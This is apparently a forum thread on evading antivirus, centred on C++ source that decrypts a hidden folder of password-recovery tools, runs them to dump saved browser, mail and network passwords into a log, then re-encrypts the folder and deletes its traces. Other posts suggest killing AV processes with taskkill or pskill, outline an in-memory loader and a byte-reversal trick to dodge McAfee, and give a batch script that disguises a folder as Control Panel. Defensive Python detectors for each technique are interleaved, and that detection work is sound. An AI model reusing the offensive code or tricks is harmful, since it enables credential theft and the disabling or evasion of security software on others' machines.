
Encrypting executables


sc0rpi0


Some AV products have random names for their scanning, so looking for process names may not help in some situations.

True; however, it may be as simple as searching for default installation directories such as "C:\Program Files" or even the registry.

Side bar: Has anyone tried to end AV processes by using the taskkill /t (which kills child processes as well)? Currently not running any AV on my VM for packing reasons for this app...


Yes, that is a good idea. Unfortunately, I wouldn't be the one to ask.

Although "taskkill /t" may work, I would recommend using pskill from Sysinternals.

I wonder... would this killing of child processes do the trick? [thinking out loud]

Not only can it kill child processes, but system processes as well. 


Here is the source using a small payload from the great folks at Nirsoft. Still a lot of work to do to finish the final program, but I'll have more time over the holidays with no work or classes to hack up some code. I may start a new thread for my own payload since this is becoming a beast of its own. This code assumes you have ccrypt in the current executing directory. Although the encrypted files should scan clean for signature-based AVs (please provide feedback), once they are run, AVs will catch the process. Also, you should manually encrypt the payload files first before running this code.

/*
 * AUTHOR: hexlax
 *
 * The encryption handling of this program is done. Please
 * give me feedback if any AVs catch it.
 *
 * Command line options for final product (not implemented now):
 * a) -q quiet mode, nothing displays to screen
 * b) -f force run anyways
 *     i) if local admin privs not present
 *    ii) if AV is detected and forced stop failed
 *   iii) Places payload in danger of AV removal
 * c) -c config file path [optional - default presumed]
 *     i) payload list
 *    ii) utilities list (ccrypt, pskill, etc.)
 * d) -k only attempt to kill AV, no payload run
 *
 * The final product should be scalable enough for a user
 * to add/delete/modify the payload by editing the config file.
 */

#include "stdafx.h"   // MSVC precompiled header; drop this line outside Visual Studio
#include <iostream>
#include <string>
#include <stdlib.h>

using namespace std;

// global constants
const string PAYLOAD_FILEPATH = "tools";        // TODO: insert user pref from config file.
const string ENC_KEY = "hexlax@hak5";           // TODO: insert user pref from config file.

// Decrypt the payload directory in place (ccrypt is expected in the current directory).
void decrypt()
{
    cout << "Decrypting payload...\n";
    string syscall = "ccrypt -d -K " + ENC_KEY + " -r " + PAYLOAD_FILEPATH;
    system(syscall.c_str());
}

// Re-encrypt the payload directory after the tools have run.
void encrypt()
{
    cout << "Encrypting payload back...\n";
    string syscall = "ccrypt -e -K " + ENC_KEY + " -q -r " + PAYLOAD_FILEPATH;
    system(syscall.c_str());
}

// Run each tool, sending its output to a .tmp file in the current directory.
void run_payload()
{
    string syscall;
    cout << "Running Payload:";

    // IEPV.EXE
    cout << ".IEPV..";
    syscall = PAYLOAD_FILEPATH + "\\iepv /stext iepv.tmp";
    system(syscall.c_str());

    // MSPASS.EXE
    cout << ".MSPASS...";
    syscall = PAYLOAD_FILEPATH + "\\mspass /stext mspass.tmp";
    system(syscall.c_str());

    // NETPASS.EXE
    cout << ".NETPASS..";
    syscall = PAYLOAD_FILEPATH + "\\netpass /stext netpass.tmp";
    system(syscall.c_str());

    // PSPV.EXE
    cout << ".PSPV..";
    syscall = PAYLOAD_FILEPATH + "\\pspv /stext pspv.tmp";
    system(syscall.c_str());

    // END PAYLOAD
    cout << "\n";
}

// Consolidate the .tmp files into log.txt, then delete them.
void cleanup_temps()
{
    string syscall;
    cout << "Cleaning up...\n";

    // consolidate our tmp files into one
    // TODO: implement the user's preference here for a
    // file name & program list from config file
    // TODO: after list file is done, use a for statement for cleaner code
    cout << "Saving output to log.txt...\n";
    syscall = "type iepv.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type mspass.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type netpass.tmp >> log.txt";
    system(syscall.c_str());
    syscall = "type pspv.tmp >> log.txt";
    system(syscall.c_str());

    // get rid of *.tmp files
    cout << "Removing temp files...\n";
    syscall = "del *.tmp";
    system(syscall.c_str());
}

int main()
{
    decrypt();
    run_payload();
    encrypt();
    cleanup_temps();
    cout << "Scan Complete!\n";
    return 0;
}

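From the defender's side, the wrapper above leaves a very recognisable trail in process-creation telemetry: an optional forced kill of the AV process (taskkill /t or pskill, as discussed earlier in the thread), then ccrypt -d on the tool directory, then several password-recovery tools started with /stext. The following detection logic is an added example, not code from the thread or from hexlax; the log format, hostnames, timestamps and the protected process names are constructed placeholders, and the tool names are the ones the wrapper runs.

```python
"""Detection for the wrapper pattern in this thread: a forced AV kill
(taskkill /t or pskill), on-host decryption with ccrypt -d, then Nirsoft-style
password-recovery tools run with /stext. Added example; the log format,
hostnames and protected process names are constructed placeholders."""
import re
from dataclasses import dataclass

# Image names (without .exe) a defender wants protected from forced termination.
# Constructed placeholders: fill in your own AV/EDR service image names.
PROTECTED = {"example-av-service", "example-av-scanner"}

# Tools the wrapper in the thread runs; /stext writes recovered passwords to a file.
CRED_DUMP_TOOLS = {"iepv", "mspass", "netpass", "pspv"}

# Constructed process-creation log format: timestamp host pid=N cmd="..."
LOG_RE = re.compile(r'^(?P<ts>\S+)\s+(?P<host>\S+)\s+pid=(?P<pid>\d+)\s+cmd="(?P<cmd>.*)"$')


@dataclass
class Alert:
    line_no: int
    host: str
    rule: str
    command: str


def _image(token):
    """'tools\\iepv.exe' -> 'iepv': strip any path and a trailing .exe."""
    name = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(cmd):
    """Return the rule a single command line matches, or None."""
    parts = cmd.split()
    if not parts:
        return None
    image, args = _image(parts[0]), [p.lower() for p in parts[1:]]
    if image == "taskkill":
        forced = "/f" in args or "/t" in args
        named = {_image(args[i + 1]) for i, a in enumerate(args) if a == "/im" and i + 1 < len(args)}
        if forced and named & PROTECTED:
            return "av_kill"
    if image == "pskill" and any(_image(a) in PROTECTED for a in args):
        return "av_kill"
    if image == "ccrypt" and "-d" in args:
        return "payload_decrypt"
    if image in CRED_DUMP_TOOLS and "/stext" in args:
        return "credential_dump"
    return None


def scan(lines):
    """Apply classify() to every parseable log line, keeping log order."""
    alerts = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if m and (rule := classify(m["cmd"])):
            alerts.append(Alert(n, m["host"], rule, m["cmd"]))
    return alerts


def chained_hosts(alerts):
    """Hosts on which ccrypt -d was followed by a credential-dump tool,
    i.e. the decrypt -> run sequence the wrapper performs."""
    decrypted, hits = set(), set()
    for a in alerts:
        if a.rule == "payload_decrypt":
            decrypted.add(a.host)
        elif a.rule == "credential_dump" and a.host in decrypted:
            hits.add(a.host)
    return hits


# Constructed sample log; ws01 shows the full chain, ws02 only an AV kill.
SAMPLE_LOG = """\
2009-12-20T10:00:01Z ws01 pid=1201 cmd="C:\\Windows\\System32\\notepad.exe C:\\notes.txt"
2009-12-20T10:00:05Z ws01 pid=1210 cmd="taskkill /f /t /im example-av-service.exe"
2009-12-20T10:00:09Z ws01 pid=1215 cmd="ccrypt -d -K hexlax@hak5 -r tools"
2009-12-20T10:00:12Z ws01 pid=1220 cmd="tools\\iepv /stext iepv.tmp"
2009-12-20T10:00:13Z ws01 pid=1221 cmd="tools\\mspass /stext mspass.tmp"
2009-12-20T10:00:20Z ws02 pid=4410 cmd="pskill example-av-scanner"
2009-12-20T10:00:25Z ws02 pid=4415 cmd="ccrypt -e -K hexlax@hak5 -q -r tools"
""".splitlines()

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"line {a.line_no} {a.host} {a.rule}: {a.command}")
    print("decrypt->dump chain on:", sorted(chained_hosts(found)))
```

The single-event rules are cheap and each would be noisy on its own; the decrypt-then-dump correlation in chained_hosts is what turns them into a confident alert, which is why the author's own remark that "AVs will catch the process" once the tools run is the realistic outcome even when the files at rest scan clean.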

11 months later...

Well, let's think outside of the box for a minute ;-)

before hand.... *payload* = "Our program that we are trying to sneak past the AV"

If I were trying to do this back in the day (MS-DOS 5-6.22), I would encrypt the file in a .exe loader (that I would write myself), and then decrypt the *payload* in memory, and reload the decrypted *payload* overtop of some null-padded chunk of my loader's memory (maybe just overtop of the original .exe's memory), and restart it.....

So, maybe a loader could be written that:

A. uses the same libs and DLLs (so they are already loaded)

B. decrypts its payload, and overwrites itself (WITHOUT GETTING SWAPPED OR WRITTEN TO DISK!!!!)

C. restarts its own execution......

Maybe this would get past the anti-virus.

I don't have the time, or I would look into the idea, but I suspect that if you search MSDN, we can probably find the format of a .EXE file, and how the libs (.dll's) are loaded...., and once you do that, you can load the needed libs, and bypass the whole writing to disk (I AM ASSUMING THAT THAT IS WHERE AN AV PICKS IT UP AT.....), and bypass detection.

I use McAfee, and I am trying to whip up a little POC program to see if McAfee will catch the decrypted *payload* in memory or not...

I'll keep ya filled in


Funny thing here.....

By simply reversing the entire file (first byte becomes last byte, second byte becomes next to last byte, etc.), my file goes totally undetected.... (DIDN'T EVEN HAVE TO CRYPT IT!!!!, just flip the script ;-) )

Yep, just like I thought.... McAfee only catches it upon a disk write (I still haven't tried to execute anything from memory, but I suspect that we would kind of need to bypass Windows for that kind of functionality), so in theory we could custom load our decrypted *payload*, and run it without the AV noticing it... (this would maybe even eliminate the need for an AV kill..)

But then again, this would be a real temporary thing... I'm willing to bet tools like this are written every day, and added to AV signature files every day...

But remember this: if you write a nifty tool that successfully does this, everyone will want to use it, then it becomes mainstream, and then AVs will notice it, and it will get blocked by AV software ;-)

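The byte-reversal result above is worth turning around into a scanner-side check. A signature engine that only matches patterns in the stored byte order is blind to a reversed file, but the transformation is trivially invertible, and a reversed PE image is itself an artefact: the file ends in "ZM" and, once flipped back, starts with the MZ header and carries the PE signature. The code below is an added example, not part of the thread; the signature list is a constructed placeholder pattern, not a real AV signature, and build_sample_image() produces a constructed stand-in rather than a real executable.

```python
"""Orientation-insensitive signature check. The post above found that a
byte-reversed file slipped past a signature scan; applying the same patterns
to both the stored bytes and their reversal closes that gap, and a reversed PE
image is a recognisable artefact in its own right. Added example; the
signature list is a constructed placeholder, not a real AV pattern."""

# Constructed placeholder signatures: (name, byte pattern) pairs.
SIGNATURES = [
    ("example.marker.string", b"EXAMPLE-MARKER-STRING"),
]


def looks_like_reversed_pe(data):
    """A byte-reversed PE file ends with b'ZM' and, once flipped back,
    starts with the MZ header and carries the PE\\0\\0 signature."""
    if len(data) < 64 or not data.endswith(b"ZM"):
        return False
    flipped = data[::-1]
    return flipped.startswith(b"MZ") and b"PE\x00\x00" in flipped


def scan_bytes(data):
    """Return (signature, orientation) findings for a file's contents,
    checking the bytes as stored and byte-reversed."""
    findings = []
    for orientation, view in (("as-stored", data), ("reversed", data[::-1])):
        for name, pattern in SIGNATURES:
            if pattern in view:
                findings.append((name, orientation))
    if looks_like_reversed_pe(data):
        findings.append(("heuristic.reversed-pe-image", "reversed"))
    return findings


def build_sample_image():
    """Constructed stand-in for a PE: MZ stub, e_lfanew pointing at PE\\0\\0,
    then a marker string that the placeholder signature matches."""
    dos_header = b"MZ" + b"\x90" * 58 + (64).to_bytes(4, "little")  # e_lfanew = 64
    return dos_header + b"PE\x00\x00" + b"\x00" * 20 + b"EXAMPLE-MARKER-STRING" + b"\x00" * 10


if __name__ == "__main__":
    sample = build_sample_image()
    print("as written:", scan_bytes(sample))
    print("byte-reversed:", scan_bytes(sample[::-1]))
```

The reversed-PE heuristic fires without any signature at all, which matters because the author's point is that the transformed file has no known pattern in it; a reversed executable has no legitimate reason to exist on disk, so it is a strong indicator on its own.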

Oh, I know a way. There is a way to rename a folder using the entire path; it then appears to be a Control Panel. Of course this only works on XP. I feel I should admit I didn't make this, I found it.

@echo off
rem Toggle the folder between its plain name (Hide) and the device-name + CLSID form.
rem The \\.\ prefix bypasses Win32 name checks, which is why "con" can be used as a name.
if exist con.{21EC2020-3AEA-1069-A2DD-08002B30309D}\nul goto toggleoff
if exist Hide\nul goto toggleon
goto end
:toggleoff
move "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Hide>nul
goto end
:toggleon
move Hide "\\.\%cd%\con.{21EC2020-3AEA-1069-A2DD-08002B30309D}">nul
:end

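The batch script relies on Explorer rendering any folder named with a .{CLSID} suffix as the corresponding shell object, and on the \\.\ device namespace to get a reserved name like "con" past the normal Win32 checks. Neither trick hides anything from the plain filesystem API, so an inventory or IR script can enumerate such folders directly. The walker below is an added example, not from the thread; the CLSID is the one the post uses, and the directory names created in the usage are constructed.

```python
"""Flag directories whose names use the Explorer CLSID-suffix trick described
above (e.g. con.{CLSID}, which Explorer shows as Control Panel). Added example,
not from the thread; walks with os.walk, which sees the real names."""
import os
import re

# Reserved DOS device names; a normal Win32 create call refuses them, so a folder
# carrying one was created through the \\.\ or \\?\ namespace, as in the script.
RESERVED_DEVICES = (
    {"con", "prn", "aux", "nul"}
    | {f"com{i}" for i in range(1, 10)}
    | {f"lpt{i}" for i in range(1, 10)}
)

# name.{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
CLSID_SUFFIX = re.compile(
    r"^(?P<stem>.+)\.\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$"
)


def classify_name(name):
    """Return None, 'clsid-suffix' or 'reserved-device+clsid' for one directory name."""
    m = CLSID_SUFFIX.match(name)
    if not m:
        return None
    stem = m["stem"].lower()
    return "reserved-device+clsid" if stem in RESERVED_DEVICES else "clsid-suffix"


def find_masquerading_dirs(root):
    """Walk root with the filesystem API (not the shell) and list directories
    whose names Explorer would render as a shell object, with their kind."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            kind = classify_name(d)
            if kind:
                hits.append((os.path.relpath(os.path.join(dirpath, d), root), kind))
    return sorted(hits)


if __name__ == "__main__":
    import tempfile

    # Constructed layout: one folder from the script, one benign, one CLSID-suffixed.
    root = tempfile.mkdtemp()
    for name in ("con.{21EC2020-3AEA-1069-A2DD-08002B30309D}", "Hide",
                 "Docs.{21EC2020-3AEA-1069-A2DD-08002B30309D}"):
        os.mkdir(os.path.join(root, name))
    for path, kind in find_masquerading_dirs(root):
        print(f"{kind}: {path}")
```

On Windows the walk should be run with an absolute \\?\-prefixed root if the tree may contain reserved names deeper down, since os.walk itself does not add the prefix; on any platform the name classification is the same.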